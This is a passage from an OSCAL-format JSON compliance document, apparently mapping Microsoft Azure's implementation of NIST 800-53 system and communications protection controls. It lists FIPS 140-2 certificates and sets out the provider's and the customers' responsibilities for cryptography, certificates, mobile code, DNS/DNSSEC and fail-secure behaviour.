Kernel Crypto API Cryptographic Module * 3784 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 3956 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 3946 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 3918 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 3842 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 3839 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 3813 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 3794 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 3781 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4282 - OpenSSL FIPS Provider Network Devices Encrypted data may transit across the Azure network, but the network devices are agnostic as to the type of data being transmitted. Network devices use the following cryptographic modules: * 2984 - Cisco FIPS Object Module * 2505 - Cisco FIPS Object Module * 3429 - EOS MACsec Alpha Hybrid Module * 3420 - EOS MACsec Bravo Hybrid Module * 2909 - Arista EOS Crypto Module v1.0 * 3621 - Juniper Networks MX80, MX104, MX240, MX480, MX960 3D Universal Edge Routers with RE-S-X6-64G/RE-S-X6-128G Routing Engine and MIC-MACSEC-20GE MACSec Card * 2921 - Juniper Networks SRX1400, SRX3400, and SRX3600 Services Gateways * 3629 - F5® Device Cryptographic Module * 2988 - Citrix FIPS Cryptographic Module * 4019 - Arista EOS Crypto Module * 1521 - Cisco 2951, Cisco 3925 and Cisco 3945 Integrated Services Routers (ISRs) * 2409 - Cisco ASR 1001, 1001-X, 1002, 1002-X, 1004, 1006 and 1013 * 2090 - Cisco ASR 1001, ASR 1002, ASR1002-X, ASR 1004, ASR 1006 and ASR 1013 * 3775 - Cisco ASR 1000 Series Routers with MACSEC * 3988 - Cisco ASR 1000 Series Routers without MACSEC * 3841 - F5® Device Cryptographic Module * 2896 - Pulse Secure Cryptographic Module * 3416 - Juniper Networks MX240, MX480, MX960, MX2010, MX2020 3D Universal Edge Routers and EX9204, EX9208, EX9214 Ethernet Switches with RE1800 Routing Engine * 3934 - Juniper Networks MX240, MX480, MX960 3D Universal Edge Routers with RE1800 Routing Engine and Multiservices MPC * 3935 - Juniper Networks MX240, MX480, MX960 3D Universal Edge Routers with RE1800 Routing Engine and MPC7E-10G MACsec Card * 2388 - IOS Common Cryptographic Module (IC2M) Rel5 AES-256 bit encrypted SSH is used for network device authentication using Federal Information Processing Standards (FIPS) 140-2 approved algorithms: * 0048 - SecureCRT VanDyke 8.0.3 (FIPS Validation Certificate 0048) * 2643 - nShield F2 500+, nShield F2 1500+ and nShield F2 6000+ Azure Key Stores The Thales nShield Hardware Security Modules used by KeyVault employ cryptographic modules certified by NIST as being Federal Information Processing Standards (FIPS) 140-2 compliant; relevant NIST certificate number is 2643. Azure Managed HSM and KeyVault utilize CMVP certificate number 4399 from Marvell vendor. Azure Dedicated HSM utilizes CMVP certificate numbers 4090 and 4684 certificate numbers from Thales vendor. Azure has an alternative implementation for the security control. Azure baseline configurations tracked via AzSecPack are designed to implement and monitor appropriate ciphers used for authentication. Moreover, Azure implements Federal Information Processing Standards (FIPS) 140-2-approved algorithms in CMVP-validated cryptographic modules but is currently unable to run all servers in FIPS mode. Where possible, Azure implements FIPS mode on servers. However, FIPS mode has operational impacts on key Azure services for non-security cryptographic implementations. In addition, some cipher suites which are considered weak are used to accommodate Azure customers. Lastly, Microsoft continues to drive TLS 1.2 and 1.3 only within Azure. Elimination of TLS 1.0 and 1.1 is an Enterprise Promise, ensuring visibility at the highest levels of Azure Asset misconfigurations do occur, but are monitored and tracked via AzSecPack baseline settings. If an asset allows TLS 1.0 or 1.1, the owning service team is alerted via monitoring tools. Azure uses multiple reporting engines to ensure all TLS below 1.2 and 1.3 is identified and appropriate action is taken. It's important to note some externally facing services must support older TLS versions for customer purposes."}],"responsibilities":[{"uuid":"201ecf13-028f-4d87-91c9-20520311c848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing customer-defined cryptography within customer-deployed resources in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. Government customers will ensure that personal computing devices (client systems) are configured to request FIPS 140-2 encryption ciphers and protocols for all network sessions. Commercial customers may also choose to use FIPS 140-2 ciphers and protocols when connecting to Azure Public.","provided-uuid":"85eaccaa-72bc-4d9f-bbd4-6b36fba345cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2e611f9c-3114-4632-b062-aabaf0561508","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-15","statements":[{"uuid":"75673ee2-aa06-40dc-8cbb-a6b628443d03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-15_smt.a","by-components":[{"uuid":"43b2878f-bdc0-4f4c-833b-37facea53121","export":{"provided":[{"uuid":"5633f161-80cc-463e-80df-5fa3660cd63c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"}],"description":"Azure does not allow collaborative computing devices and there are no instances of collaborative computing devices within the Azure accreditation boundary managed by Azure. This includes Hyper-V clipboard functions, microphones, network white boards, and cameras."}],"responsibilities":[{"uuid":"68001c48-2815-4e8e-a008-43e7ae656889","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for prohibiting remote activation of any collaborative computing devices within or controlled from customer-deployed resources and defining exceptions where remote activation is allowed (if any).","provided-uuid":"5633f161-80cc-463e-80df-5fa3660cd63c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eedd51b9-b852-46ba-a7d8-ef4f00760815","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-15_smt.b","by-components":[{"uuid":"ca0a7d71-c2eb-4c41-a42e-5d57b5e5bacc","export":{"provided":[{"uuid":"624d5a5a-8841-4985-856c-6267e7402617","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"}],"description":"Azure does not allow collaborative computing devices and there are no instances of collaborative computing devices within the Azure accreditation boundary managed by Azure. This includes Hyper-V clipboard functions, microphones, network white boards, and cameras."}],"responsibilities":[{"uuid":"ebded381-5192-4bb4-bc5c-82f9b68b45cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing a notification when physically presenting at a collaborative device.","provided-uuid":"624d5a5a-8841-4985-856c-6267e7402617"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63229042-229b-4871-a910-d2523b3e47a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-17","statements":[{"uuid":"63465b4b-0295-4db8-84c1-1f95917e59ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-17_smt.a","by-components":[{"uuid":"d24ab942-b25d-444e-a83d-717cc1fccbc3","export":{"provided":[{"uuid":"74f2e9bd-282d-4db9-b5ed-cfa46ba0b045","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"}],"description":"The Key Management Standard applies to the operation of all Microsoft's online services residing within the Azure environment utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and preproduction. Microsoft's corporate Public Key Infrastructure (PKI) has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft Corporation. Microsoft corporate PKI functions as the Certificate Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. Internal Azure traffic does not require the use of digital certificates and also includes the use of self-signed certificates. The use of self-signed certificates applies exclusively to internal use within Azure."}],"responsibilities":[{"uuid":"94240893-2ebc-4f07-8f23-4d4c9f04cbef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for defining and enforcing a policy for issuing public key certificates or obtaining public key certificates from an approved service provider. Government customers are responsible for having a process in place to check the validity of the Azure websites prior to signing on by reviewing the digital certificate on the site to ensure they are the Azure websites. If government customers are using USGCB baselines, supported web browsers will enforce this review automatically by default and prevent connections if the digital certificate is invalid.","provided-uuid":"74f2e9bd-282d-4db9-b5ed-cfa46ba0b045"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"abc311da-cb82-4955-a7f2-417bf1d2e2ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-17_smt.b","by-components":[{"uuid":"3a265edd-ac91-4fd8-b336-43527e7f858d","export":{"provided":[{"uuid":"8bc2bdff-e6ed-47f9-914a-b17d84927c93","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"}],"description":"The Key Management Standard applies to the operation of all Microsoft's online services residing within the Azure environment utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and preproduction. Microsoft's corporate Public Key Infrastructure (PKI) has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft Corporation. Microsoft corporate PKI functions as the Certificate Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. Internal Azure traffic does not require the use of digital certificates and also includes the use of self-signed certificates. The use of self-signed certificates applies exclusively to internal use within Azure."}],"responsibilities":[{"uuid":"6ce41063-26c2-4413-a30d-f4d09b8869c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"}],"description":"The customer is responsible to only include approved trust anchors in trust stores or certificate stores managed for customer-deployed resources.","provided-uuid":"8bc2bdff-e6ed-47f9-914a-b17d84927c93"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b4b2148f-fafe-40c2-9df9-791c88ad0480","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-18","statements":[{"uuid":"00c01d3c-fe18-4454-9dfe-1a0fb9bee228","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-18_smt.a","by-components":[{"uuid":"b991c3e4-ad86-4aa4-8fa2-8d2d1af660fd","export":{"provided":[{"uuid":"476c9de8-fe90-4d03-a8ae-656fcf915738","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"}],"description":"Microsoft's Security Development Lifecycle (SDL) process includes provisions for defining acceptable and unacceptable mobile code technologies. Unapproved mobile code is any mobile code that has not been developed and approved through the SDL._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5ddbc2f5-334c-444e-9eeb-f5692e9bf71d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"}],"description":"The customer is responsible for defining acceptable and unacceptable mobile code technologies.","provided-uuid":"476c9de8-fe90-4d03-a8ae-656fcf915738"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ac3e155d-0c75-41af-a144-349f489f5a33","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-18_smt.b","by-components":[{"uuid":"9a67b515-51a3-4640-bf4c-62e3dc9540db","export":{"provided":[{"uuid":"938332c6-039f-4b4f-97a7-aaebdb13c337","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"}],"description":"All approved mobile code in use in the environment is developed and reviewed following the SDL. All releases have release-specific implementation guidance and testing to ensure that only acceptable code is released._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d04a2854-48cf-4ff9-bc23-52216e16bb90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"}],"description":"The customer is responsible for establishing usage restrictions and implementation guidance for acceptable mobile code and mobile code technologies.","provided-uuid":"938332c6-039f-4b4f-97a7-aaebdb13c337"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4068a03e-95dd-48d9-a194-ea7c5b86baae","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-20","statements":[{"uuid":"98dafeea-00c2-4004-b57c-354070fa4047","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-20_smt.a","by-components":[{"uuid":"cf00b190-22d5-4d6b-b6c8-ea4eff610933","export":{"provided":[{"uuid":"9f306b41-8fa0-4f01-81c1-5d21a5ba2bb1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"}],"description":"The Azure DNS infrastructure provides internal name resolution for internal Microsoft assets and external name resolution services to external customers, including Federal Agencies. However, Azure does not support DNSSEC and a customer is required to either bring their own DNS servers into Azure or use a third-party DNS provider if DNSSEC is a requirement. Azure uses three types of DNS servers._x000D_ _x000D_ Azure DNS servers act as non-authoritative sources for DNS requests only from clients hosted inside Azure. A client makes a DNS query to a system DNS server; the system DNS server in turn queries an authoritative source outside the system. System DNS servers do not support the DNSSEC protocol. This control requires system DNS servers, when requested by clients, to perform origin/integrity verification of the response provided by authoritative sources. The control assumes that the client makes a DNS query of a system DNS server and that the DNS server must then query an authoritative source outside the system. The risk that the external authoritative source has been compromised is mitigated by the origin/integrity verification._x000D_ _x000D_ Azure internal DNS servers resolve DNS queries from Azure servers. Azure servers do not request origin/integrity verification of the DNS query; instead origin/integrity is assured via other means such as the communications channel using TLS._x000D_ _x000D_ Azure DNS production servers act as authoritative sources for DNS requests from external clients for various Azure domains and do not respond to any DNS queries against zones for which they are not the authority._x000D_ _x000D_ This control requires system DNS servers, when requested by clients, to perform origin/integrity verification of the response provided by authoritative sources. The control assumes that the client makes a DNS query of a system DNS server and that the DNS server must then query an authoritative source outside the system. The risk that the external authoritative source has been compromised is mitigated by the origin/integrity verification. Azure DNS servers perform two functions:_x000D_ _x000D_ 1. Resolving DNS queries from Azure servers._x000D_ 2. Acting as authoritative sources for DNS requests from external clients for certain Microsoft.com subdomains._x000D_ _x000D_ For case 1, queries are either for internal domains for which Azure DNS servers are authoritative, or for external domains used by Azure's services. In either case, Azure servers do not request origin/integrity verification of the DNS query. For case 2, this case is not possible for Azure DNS servers._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a104c27b-d152-423e-bc6f-07df0822654f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"}],"description":"The customer is responsible for a secure name and address resolution service, including providing data origin authentication and integrity verification, as well as authoritative name resolution data, in response to name and address resolution queries. Note: this control is only applicable to the customer if hosting DNS and resolving .gov domains.","provided-uuid":"9f306b41-8fa0-4f01-81c1-5d21a5ba2bb1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"929ef5c7-0ab8-4026-aeec-4dde518b5bcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-20_smt.b","by-components":[{"uuid":"01440a28-7f88-4dfa-8e23-1c9572a85353","export":{"provided":[{"uuid":"d663070e-23eb-4ac0-87d9-08002e4c7bf7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"}],"description":"The Azure DNS infrastructure provides internal name resolution for internal Microsoft assets and external name resolution services to external customers, including Federal Agencies. However, Azure does not support DNSSEC and a customer is required to either bring their own DNS servers into Azure or use a third-party DNS provider if DNSSEC is a requirement._x000D_ _x000D_ Azure DNS is a public service and anyone from internet can access externally hosted zones. For internal Azure services that depend on DNS, Microsoft employs TLS to mitigate the need for DNSSEC. Azure customers who intend to secure their applications against DNS-based attacks can also use TLS to mitigate the need for DNSSEC._x000D_ _x000D_ Microsoft implements compensating controls that mitigate the risk of not enacting DNSSEC according to IPSEC policy. HTTPS/TLS is required for all connections into the Azure environment, establishing secure connections with Azure resources. A customer connecting to an invalid server still needs to be presented with a valid certificate to risk a security breach. Because the TLS/HTTPS implementation provides both authentication and encryption, Microsoft considers it sufficient for mitigating the risks of internal servers not being configured with DNSSEC. Outside of the effectiveness of TLS/HTTPS, customers can deploy their own VM-based DNS servers in the virtual networks. Customers can also choose to host DNS Zones with third-party DNS hosting providers that support DNSSEC. Customers can also configure their own DNS servers to support DNSSEC validation/verification and use these servers to resolve DNS queries instead of Azure provided recursive resolver._x000D_ _x000D_"}],"responsibilities":[{"uuid":"aac39be8-acbb-440d-bd50-60667f4c348a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"}],"description":"The customer is responsible for a secure name and address resolution service, including the ability to provide the security status of child zones, to verify chain of trust among parent and child domains. Note: this control is only applicable to the customer if hosting DNS and resolving .gov domains.","provided-uuid":"d663070e-23eb-4ac0-87d9-08002e4c7bf7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"09b0e98a-f637-41b5-96d4-4e4c092604fd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-21","statements":[{"uuid":"e717475a-ac45-4438-b0ba-8c7eb38a0d94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-21_smt","by-components":[{"uuid":"790ccc90-4666-43fe-be5d-e6cce1e9c020","export":{"provided":[{"uuid":"cc9e4a27-a92f-4caa-bd51-1c8f2fd9cb01","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"}],"description":"Azure DNS resolvers do not support DNSSEC and hence do not verify the integrity of a DNS response. Customers who require DNSSEC are required to bring their own DNS resolver servers._x000D_ _x000D_ Microsoft implements compensating controls that mitigate the risk of not enacting DNSSEC according to IPSEC policy. HTTPS/TLS is required for all connections into the Azure environment, establishing secure connections with Azure resources. A customer connecting to an invalid server still needs to be presented with a valid certificate to risk a security breach. Because the TLS/HTTPS implementation provides both authentication and encryption, Microsoft considers it sufficient for mitigating the risks of internal servers not being configured with DNSSEC. Outside of the effectiveness of TLS/HTTPS, customers can deploy their own VM-based DNS servers in the virtual networks. Customers can also choose to host DNS Zones with third-party DNS hosting providers that support DNSSEC. Customers can also configure their own DNS servers to support DNSSEC validation/verification and use these servers to resolve DNS queries instead of Azure provided recursive resolver._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f8178f08-9bde-4e19-8a3e-28239f713adf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"}],"description":"The customer is responsible for configuring customer-deployed resources to request and perform data origin authentication and data integrity verification on name/address resolution responses received from authoritative sources.","provided-uuid":"cc9e4a27-a92f-4caa-bd51-1c8f2fd9cb01"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"69e7edae-8a67-4bc7-b5eb-ed3deb0fba09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-22","statements":[{"uuid":"4924c170-223a-4d2b-8aa3-41bfd0c334b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-22_smt","by-components":[{"uuid":"4f369403-3482-45b4-b8f2-4fd11731650d","export":{"provided":[{"uuid":"4571f42d-1df2-43e5-b62c-0cb645fdbd75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"}],"description":"The Azure DNS offering provides name and address resolution. Fault tolerance is built into the service through redundancy at multiple levels, including multiple DNS server clusters and multiple servers per cluster, and deployment at multiple Azure datacenter facilities which are geographically separated. Azure DNS also leverages network controls to restrict type of hosts that can access an authoritative DNS server in a particular role._x000D_ _x000D_ The implementation incorporates a master repository of DNS zones. Master repository is deployed in multiple datacenters across different geographical regions for redundancy purposes. Data from master repository is pulled into edge DNS servers on demand for resolving authoritative DNS queries. Data from master repository is backed up and monitored with the security incident and event management tool as documented in the AU family of controls._x000D_ _x000D_ Additionally, a backup system built using a completely different hardware and software system stack is implemented and kept in sync with the master repository. This system is engaged in case of a catastrophic failure of the primary system._x000D_ _x000D_ Azure DNS recursive resolver service has built-in cross region failover capability that automatically switches the DNS traffic to another region in case there is a catastrophic failure of DNS resolution in one region._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6bcbec69-2039-4cd8-98a9-3f0b0ec7b5c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"}],"description":"The customer is responsible for ensuring that the systems providing address resolution services for customer-deployed resources are fault-tolerant and implement internal/external role separation. Note: if customers configure their Domain Name Server (DNS) settings to use Microsoft Azure servers, Microsoft Azure DNS can support fault tolerance.","provided-uuid":"4571f42d-1df2-43e5-b62c-0cb645fdbd75"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9a995a58-e813-4220-ad43-0c970928d0f6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-23","statements":[{"uuid":"04291b0b-e292-4d83-a512-93894f96b399","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-23_smt","by-components":[{"uuid":"e1d5baef-4746-4e7d-af2e-dc4f0e319eb9","export":{"provided":[{"uuid":"12ea3bea-449d-43fb-8426-c63b9a00015b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"}],"description":"Azure uses digital certificates to establish the identity of Jumpboxes, Debug servers, and Network Hop Boxes as the access points to the Azure environment. Digital certificates are used in public key cryptography (PKI) to establish the identity of assets for purposes of authentication. This also supports encrypted connections using TLS, which is resistant to man in the middle attacks._x000D_ _x000D_ All communications between Azure internal components that transfer confidential information are protected using TLS. In most cases, SSL certificates are self-signed, and their fingerprints are distributed over the same channels as the IP addresses. Exceptions are for any certificates for connections that could be accessed from outside the Azure network, including the storage service, and for the Fabric Controllers (FCs). FCs have certificates issued by a Microsoft Certificate Authority (CA) that chains back to a trusted root CA._x000D_ _x000D_"}],"responsibilities":[{"uuid":"dc52a73b-2fe7-4c07-8c72-ff7df784193c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"}],"description":"The customer is responsible for protecting the authenticity of communications sessions involving customer-deployed resources. Government customers are responsible for having a process in place to check the validity of the Microsoft Azure websites prior to signing on by reviewing the digital certificate on the site to ensure they are the Microsoft Azure websites. If government customers are using USGCB baselines, supported web browsers will enforce this review automatically by default and prevent connections if the digital certificate is invalid.","provided-uuid":"12ea3bea-449d-43fb-8426-c63b9a00015b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"21d16a49-d0d7-4a7b-a282-3b78b0e2137d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-24","statements":[{"uuid":"7cf9e0ae-c22b-455b-9001-c8ff9cba0495","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-24_smt","by-components":[{"uuid":"69d98218-bacf-49c7-a03e-1aeca044db20","export":{"provided":[{"uuid":"301da659-59d9-4bfd-92a0-8d0e68272791","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"}],"description":"To preserve data in the event of a system failure, Azure implements geographic redundancy and data mirroring. Azure employs geo-replication for Azure assets which can establish alternate storage sites geographically. Synchronization is the process of ensuring that files and directories already exist on the replica server and that they are identical to the original copies on the master server. Synchronization occurs before replication. Furthermore, Azure databases are data replicated through live mirroring. Boundary protection devices fail over to equally secure backup devices. In the event the process fails, the mechanisms fail to a known secure closed state, preserving confidentiality and integrity of all data within the system."}],"responsibilities":[{"uuid":"7da4b872-49ef-48cb-962c-8f1627650050","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring that customer-deployed resources fail in a known-state for customer-defined types of failures to preserve the system state information in failure.","provided-uuid":"301da659-59d9-4bfd-92a0-8d0e68272791"}]},"description":"See inheritance and customer responsibility 